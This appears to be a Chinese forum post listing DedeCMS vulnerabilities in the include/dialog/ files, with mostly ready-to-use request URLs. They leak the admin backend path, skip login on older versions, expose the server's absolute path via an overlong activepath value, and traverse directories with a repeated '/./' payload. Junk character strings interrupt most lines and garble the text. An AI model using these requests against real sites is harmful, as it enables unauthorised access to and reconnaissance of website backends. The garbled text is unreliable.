1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
+ g h* |4 t% l; x
$ k- u/ E3 w1 y, |4 x员帐号,新版本的就直接转向了后台.
7 e* ?5 x. v9 u4 L
- r; k/ V! I4 `+ k1 }2.include/dialog/config.php会爆出后台管理路径
. n' Z/ J( v4 u r
; S: M7 m4 i- p8 Y& p* j3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
% j: N2 Y/ a3 J- p) z9 U
( ]4 t( x/ r! u4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.: G6 C# C" `. [; w% W F( [6 K
$ `7 \+ A" {4 k3 a5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
+ \0 z1 m& r& u+ i& f
- [; t1 c9 ?* r1 s) X; g3 v到根目录去.不过这些版本的访问地址有些不同.
l/ A( D/ j* Y G w* C b% y地址为require/dialog/select_soft.php?activepath=/././././././././
- O, \$ M L' p' x7 r
9 q0 \; F5 }2 J# oinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
' T& Y9 A' x2 v! H5 @, P. U存在相同问题的文件还有0 F' i2 y# Q- x2 h3 ~: o$ p
include\dialog\select_images.php# g* t/ T% b3 l- \9 y" m0 N7 \
include\dialog\select_media.php
' M" L& x8 @: b; @. v4 Einclude\dialog\select_templets.php. l/ ]* ^. r1 L+ C! t4 q2 h
|